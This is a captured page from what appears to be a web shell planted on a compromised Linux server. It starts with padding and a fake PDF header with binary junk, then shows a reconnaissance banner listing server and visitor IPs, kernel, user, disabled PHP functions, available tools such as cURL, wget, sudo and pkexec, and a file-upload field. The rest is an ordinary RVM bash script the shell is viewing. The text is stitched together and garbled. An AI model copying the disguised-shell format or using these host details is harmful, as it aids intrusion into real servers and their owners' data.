...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 65.108.66.160 / Your IP : 216.73.217.50 Web Server : Apache System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64 User : alasaweborg ( 1047) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/local/rvm/scripts/functions/ |
Upload File : |
#!/usr/bin/env bash
__rvm_record_install()
{
[[ -n "$1" ]] || return
\typeset recorded_ruby_name rvm_install_record_file
recorded_ruby_name="$( "$rvm_scripts_path/tools" strings "$1" )"
rvm_install_record_file="$rvm_user_path/installs"
[[ -f "$rvm_install_record_file" ]] || \command \touch "$rvm_install_record_file"
__rvm_sed_i "$rvm_install_record_file" -e "/^$recorded_ruby_name/d"
#TODO: use `for` so rvm_configure_flags are quoted properly
printf "%b" "$recorded_ruby_name -- ${rvm_configure_flags[*]}\n" >> "$rvm_install_record_file"
}
__rvm_remove_install_record()
{
\typeset recorded_ruby_name rvm_install_record_file
recorded_ruby_name="$( "$rvm_scripts_path/tools" strings "$1" )"
rvm_install_record_file="$rvm_user_path/installs"
if [[ -s "$rvm_install_record_file" ]]
then __rvm_sed_i "$rvm_install_record_file" -e "/^$recorded_ruby_name/d"
fi
}
__rvm_recorded_install_command()
{
\typeset recorded_ruby_name
recorded_ruby_name="$( "$rvm_scripts_path/tools" strings "$1" )"
recorded_ruby_name=${recorded_ruby_name%%${rvm_gemset_seperator:-"@"}*}
[[ -n "$recorded_ruby_name" ]] || return 1
if
[[ -s "$rvm_user_path/installs" ]] &&
__rvm_grep "^$recorded_ruby_name " "$rvm_user_path/installs" >/dev/null 2>&1
then
__rvm_grep "^$recorded_ruby_name " "$rvm_user_path/installs" | \command \head -n 1
else
return 1
fi
}